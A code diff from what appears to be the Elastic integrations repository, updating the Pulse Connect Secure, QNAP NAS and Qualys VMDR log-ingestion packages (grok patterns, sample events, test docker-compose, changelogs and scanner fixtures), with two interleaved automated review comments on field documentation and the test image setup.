@@ -62,7 +62,7 @@ processors: - '^Primary authentication %{WORD_tmp.outcome}' - '%{SESSION}' pattern_definitions: - SESSION: \(session:%{SPACE}?%{NOTSPACE:pulse_secure.session.id}\) + SESSION: \(session:%{SPACE}%{NOTSPACE:pulse_secure.session.id}\) ignore_failure: true - lowercase: field: network.type diff --git a/packages/pulse_connect_secure/data_stream/log/fields/fields.yml b/packages/pulse_connect_secure/data_stream/log/fields/fields.yml index 563d9763530..1c1ed71b83c 100644 --- a/packages/pulse_connect_secure/data_stream/log/fields/fields.yml +++ b/packages/pulse_connect_secure/data_stream/log/fields/fields.yml @@ -12,5 +12,5 @@ type: keyword description: >- test -- name: pulse_secure.session +- name: pulse_secure.session.id_short type: keyword diff --git a/packages/pulse_connect_secure/data_stream/log/sample_event.json b/packages/pulse_connect_secure/data_stream/log/sample_event.json index 06f1780a877..5bebefb2850 100644 --- a/packages/pulse_connect_secure/data_stream/log/sample_event.json +++ b/packages/pulse_connect_secure/data_stream/log/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-10-19T09:10:35.000+02:00", "agent": { - "ephemeral_id": "dbefdcf7-8da3-42ce-a1dd-919d2f3e0611", - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "ephemeral_id": "f5012eed-664a-4430-85b2-b8c48267837e", + "id": "1b313b92-040f-43af-8905-5b86b2755044", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.11.4" }, "client": { "address": "89.160.20.156", 
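Review bot: The renamed field `pulse_secure.session.id_short` is added to fields.yml without a `description`, so it is published as an empty cell in the exported-fields table, while the neighbouring entries only carry the placeholder text `test`. From the grok patterns in this change, the value is the bracketed short session identifier taken from the PulseSecure header, and the full identifier is captured separately into `pulse_secure.session.id` from the `(session:...)` part of the message; I would document that, e.g. `description: Short form of the session identifier from the syslog header. When the message carries the full identifier it is stored in pulse_secure.session.id.`, and replace the `test` placeholders on the sibling fields while here. Renaming `pulse_secure.session` to `pulse_secure.session.id_short` also turns the field from a keyword into an object, which breaks saved searches or visualizations that reference the old name; the pulse_connect_secure changelog is not in this excerpt, so I cannot tell whether this is recorded as a breaking change, but it probably should be.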
@@ -38,16 +38,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "id": "1b313b92-040f-43af-8905-5b86b2755044", "snapshot": false, - "version": "8.9.0" + "version": "8.11.4" }, "event": { "agent_id_status": "verified", "category": "network", "created": "2021-10-19T09:10:35.000+02:00", "dataset": "pulse_connect_secure.log", - "ingested": "2023-08-07T18:48:45Z", + "ingested": "2024-02-09T13:09:18Z", "kind": "event", "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "outcome": "success", @@ -61,7 +61,7 @@ }, "log": { "source": { - "address": "192.168.176.4:55846" + "address": "192.168.176.4:39024" } }, "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", @@ -123,4 +123,4 @@ "version": "10" } } -} +} \ No newline at end of file diff --git a/packages/pulse_connect_secure/docs/README.md b/packages/pulse_connect_secure/docs/README.md index 1f8425cb535..497fc80f28e 100644 --- a/packages/pulse_connect_secure/docs/README.md +++ b/packages/pulse_connect_secure/docs/README.md @@ -10,11 +10,11 @@ An example event for `log` looks as following: { "@timestamp": "2021-10-19T09:10:35.000+02:00", "agent": { - "ephemeral_id": "dbefdcf7-8da3-42ce-a1dd-919d2f3e0611", - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "ephemeral_id": "f5012eed-664a-4430-85b2-b8c48267837e", + "id": "1b313b92-040f-43af-8905-5b86b2755044", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.11.4" }, "client": { "address": "89.160.20.156", 
@@ -47,16 +47,16 @@ An example event for `log` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "id": "1b313b92-040f-43af-8905-5b86b2755044", "snapshot": false, - "version": "8.9.0" + "version": "8.11.4" }, "event": { "agent_id_status": "verified", "category": "network", "created": "2021-10-19T09:10:35.000+02:00", "dataset": "pulse_connect_secure.log", - "ingested": "2023-08-07T18:48:45Z", + "ingested": "2024-02-09T13:09:18Z", "kind": "event", "original": "Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", "outcome": "success", @@ -70,7 +70,7 @@ An example event for `log` looks as following: }, "log": { "source": { - "address": "192.168.176.4:55846" + "address": "192.168.176.4:39024" } }, "message": "Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.", @@ -133,7 +133,6 @@ An example event for `log` looks as following: } } } - ``` **Exported fields** 
@@ -207,8 +206,8 @@ An example event for `log` looks as following: | observer.vendor | Vendor name of the observer. | keyword | | pulse_secure.realm | test | keyword | | pulse_secure.role | test | keyword | -| pulse_secure.session | | keyword | | pulse_secure.session.id | test | keyword | +| pulse_secure.session.id_short | | keyword | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | source.as.organization.name | Organization name. | keyword | diff --git a/packages/pulse_connect_secure/manifest.yml b/packages/pulse_connect_secure/manifest.yml index c558ac5c398..079d716aa4f 100644 --- a/packages/pulse_connect_secure/manifest.yml +++ b/packages/pulse_connect_secure/manifest.yml @@ -1,6 +1,6 @@ name: pulse_connect_secure title: Pulse Connect Secure -version: 1.18.2 +version: 1.19.1 description: Collect logs from Pulse Connect Secure with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: pulse_connect_secure size: 300x70 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: [vpn_security, security] conditions: kibana: diff --git a/packages/qnap_nas/_dev/deploy/docker/docker-compose.yml b/packages/qnap_nas/_dev/deploy/docker/docker-compose.yml index 1fa5feace5c..c2cb58a5865 100644 --- a/packages/qnap_nas/_dev/deploy/docker/docker-compose.yml +++ b/packages/qnap_nas/_dev/deploy/docker/docker-compose.yml 
@@ -1,20 +1,17 @@ version: '2.3' services: qnap-nas-udp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/*.log qnap-nas-tcp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/*.log qnap-nas-tls: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/*.log diff --git a/packages/qnap_nas/changelog.yml b/packages/qnap_nas/changelog.yml index fbcbddb6343..0e02acd1c84 100644 --- a/packages/qnap_nas/changelog.yml +++ b/packages/qnap_nas/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.20.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.19.1" changes: - description: Changed owners diff --git a/packages/qnap_nas/manifest.yml b/packages/qnap_nas/manifest.yml index eb74baa1beb..ec31ddef81c 100644 --- a/packages/qnap_nas/manifest.yml +++ b/packages/qnap_nas/manifest.yml 
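Review bot: Dropping the `/bin/bash` entrypoint changes who expands `/sample_logs/*.log`: previously the shell expanded the glob before `/stream` ran, whereas now the pattern is handed to the image's entrypoint literally and the services only work if the `stream` binary expands globs itself. I cannot verify v0.15.0's behaviour from this diff, so please confirm it, or sidestep the question by listing the sample files explicitly. Since this image runs in CI for every system test, I would also pin it by digest rather than a mutable tag, e.g. `image: docker.elastic.co/observability/stream:v0.15.0@sha256:<digest>`, so a retagged image cannot silently change what the tests exercise. The `--insecure` flag on the TLS service is pre-existing and acceptable for a local test harness, but a short comment saying so would discourage it being copied into a non-test configuration.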
@@ -1,9 +1,9 @@ name: qnap_nas title: QNAP NAS -version: "1.19.1" +version: "1.20.0" description: Collect logs from QNAP NAS devices with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security"] conditions: kibana: diff --git a/packages/qualys_vmdr/_dev/deploy/docker/files/config.yml b/packages/qualys_vmdr/_dev/deploy/docker/files/config.yml index 48ea839101a..f0107d6eb3f 100644 --- a/packages/qualys_vmdr/_dev/deploy/docker/files/config.yml +++ b/packages/qualys_vmdr/_dev/deploy/docker/files/config.yml @@ -40,22 +40,70 @@ rules: 2023-06-28T09:58:12Z - 91681 + 5555555555 + 197595 + Confirmed + 3 + 0 + + Active + 2021-02-05T04:50:45Z + 2024-03-08T20:15:41Z + 35 + + + + + + + 5393 + 2024-03-08T20:15:41Z + 2024-03-08T20:15:41Z + 2022-12-14T06:52:57Z + 0 + 0 + 0 + 2024-03-08T20:15:41Z + + + 6666666666 + 197597 Confirmed 5 0 - - - + Active - 2023-06-28T06:04:26Z - 2023-07-03T06:23:47Z - 11 - 2023-07-03T06:23:47Z - 2023-07-03T06:25:17Z + 2021-02-05T04:50:45Z + 2024-03-08T20:15:41Z + 95 + + + + + + + + + + + + 5393 + 2024-03-08T20:15:41Z + 2024-03-08T20:15:41Z + 2022-12-14T06:52:57Z 0 0 - 2023-07-03T06:25:17Z + 0 + 2024-03-08T20:15:41Z @@ -82,6 +130,16 @@ rules: <![CDATA[HTTP Security Header Not Detected]]> + + + + + + + + + + CGI 2023-06-29T12:20:46Z 2017-06-05T21:34:49Z diff --git a/packages/qualys_vmdr/changelog.yml b/packages/qualys_vmdr/changelog.yml index e82f1e5af3a..5e0a1a760f9 100644 --- a/packages/qualys_vmdr/changelog.yml +++ b/packages/qualys_vmdr/changelog.yml 
@@ -1,4 +1,24 @@ # newer versions go on top +- version: "3.0.0" + changes: + - description: Expand documents to map each CVS per vulnerability. + type: enhancement + link: https://github.com/elastic/integrations/pull/9375 +- version: "2.1.0" + changes: + - description: Increase request timeout default and document timeout length warning. + type: enhancement + link: https://github.com/elastic/integrations/pull/9371 +- version: "2.0.0" + changes: + - description: Expand documents to map each vulnerability per host. + type: enhancement + link: https://github.com/elastic/integrations/pull/9293 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log index e95b4711ea2..f738c4e6b3c 100644 --- a/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log +++ b/packages/qualys_vmdr/data_stream/asset_host_detection/_dev/test/pipeline/test-asset-host-detection.log 
@@ -1,7 +1,7 @@ -{"NETBIOS": "EXCHB10","NETWORK_ID": 0,"IPV6":"0.0.0.0","OS_CPE":"xyz","EC2_INSTANCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_RESOURCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_SERVICE": "EC2","CLOUD_PROVIDER": "AWS","QG_HOSTID": "44e2cf13-xxxx-48b9-xxxx-de489547754d","METADATA": {"EC2": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}, "GOOGLE": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}, "AZURE": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}},"CLOUD_PROVIDER_TAGS": {"CLOUD_TAG": [{"NAME": "Name","VALUE": "allocator-dnt-frozen-i3en-2xl-v1-a","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z"}]}, "IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596","COLOR":"#FFFFF","BACKGROUND_COLOR":"#FFFFF"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": [{"LAST_UPDATE_DATETIME": 
"2023-05-30T07:48:14Z","LAST_FIXED_DATETIME":"2023-05-22T02:09:49Z","FIRST_REOPENED_DATETIME":"2023-05-22T02:09:49Z","LAST_REOPENED_DATETIME":"2023-05-22T02:09:49Z","TIMES_REOPENED":"2","SERVICE":"service1","AFFECT_RUNNING_KERNEL":"kernel1","AFFECT_RUNNING_SERVICE":"service1","AFFECT_EXPLOITABLE_CONFIG":"config1","ASSET_CVE":"cve3","STATUS": "New","FQDN":"exchb10.exchb10.local","INSTANCE":"instance1","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}]}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} -{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": {"TAG_ID": "19429855","NAME": "Linux"}},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": 
"abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": [{"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}]}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} -{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": 
"2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} -{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": {"TAG_ID": "19429855","NAME": "Linux"}},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": 
[{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} +{"NETBIOS": "EXCHB10","NETWORK_ID": 0,"IPV6":"0.0.0.0","OS_CPE":"xyz","EC2_INSTANCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_RESOURCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_SERVICE": "EC2","CLOUD_PROVIDER": "AWS","QG_HOSTID": "44e2cf13-xxxx-48b9-xxxx-de489547754d","METADATA": {"EC2": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}, "GOOGLE": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}, "AZURE": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}},"CLOUD_PROVIDER_TAGS": {"CLOUD_TAG": [{"NAME": "Name","VALUE": "allocator-dnt-frozen-i3en-2xl-v1-a","LAST_SUCCESS_DATE": 
"2023-06-22T12:44:21Z"}]}, "IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596","COLOR":"#FFFFF","BACKGROUND_COLOR":"#FFFFF"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","LAST_FIXED_DATETIME":"2023-05-22T02:09:49Z","FIRST_REOPENED_DATETIME":"2023-05-22T02:09:49Z","LAST_REOPENED_DATETIME":"2023-05-22T02:09:49Z","TIMES_REOPENED":"2","SERVICE":"service1","AFFECT_RUNNING_KERNEL":"kernel1","AFFECT_RUNNING_SERVICE":"service1","AFFECT_EXPLOITABLE_CONFIG":"config1","ASSET_CVE":"cve3","STATUS": "New","FQDN":"exchb10.exchb10.local","INSTANCE":"instance1","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 
443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} +{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": {"TAG_ID": "19429855","NAME": "Linux"}},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} 